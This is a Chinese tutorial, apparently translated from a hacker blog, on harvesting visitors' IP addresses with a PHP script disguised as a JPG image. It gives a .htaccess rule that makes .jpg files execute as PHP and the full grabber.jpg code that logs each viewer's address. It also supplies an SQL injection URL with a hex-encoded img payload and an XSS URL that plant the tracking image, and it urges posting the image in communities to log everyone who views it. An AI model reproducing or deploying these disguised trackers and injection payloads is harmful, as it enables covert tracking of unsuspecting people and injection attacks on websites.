在本教程中,我們將學(xué)習(xí)如何用一張照片來盜取ip地址。我的想法是通過修改.htaccess文件,將jpg文件當(dāng)作php文件來解析。
下面就是我們需要向.htaccess中添加的代碼:
AddHandler application/x-httpd-php5 .jpg
然后將下面的代碼復(fù)制到記事本中,命名為grabber.jpg
<?php
$fh = fopen(‘ip_list.txt', ‘a(chǎn)');
fwrite($fh, $_SERVER[‘REMOTE_ADDR'].”
“);
fclose($fh);
$im = imagecreatefromjpeg(“n00b.png”);
header(‘Content-Type: image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>
將grabber.jpg的權(quán)限設(shè)置為755,然后再找一張照片,將其命名為n00b.png,接著放到與grabber.jpg相同的目錄之中。
就這樣,一切工作就緒了。當(dāng)別人瀏覽grabber.jpg這張照片的時候,他的ip地址就會被記錄下來。
(譯者注:需要把這些東西上傳至我們的個人網(wǎng)站空間中)
POC:
(譯者注:作者這里貼了一張可獲取ip的演示照片,為了大家的隱私,我沒有將其貼出,讀者可自行去作者博客查看)
至此,我們的照片已經(jīng)可以開始工作了。
接著我還想說明一下如何使用SQLi來獲取ip地址。其實使用照片來盜取ip地址十分快捷,我們沒有理由去使用SQLi這種方法,但是為了讓讀者獲取到更多的知識,我還是說明一下吧:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1′ union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#
現(xiàn)在,再說一下如何使用xss來獲取ip地址:
http://leettime.net/xsslab1/chalg1.php?name=<img src=”http://leettime.net/idiots_test_lab/imageip/tryme.jpg”>&submit=Search
好了,就是這些了。
我們可以用這個技巧做許多有趣的事情,事實上大部分社區(qū)都允許我們發(fā)布一些照片,所以我們可以用這個方法去獲取所有訪問到我們照片的人的ip地址。
以上所述是小編給大家介紹的基于PHP實現(xiàn)通過照片獲取ip地址的相關(guān)內(nèi)容,希望對大家有所幫助!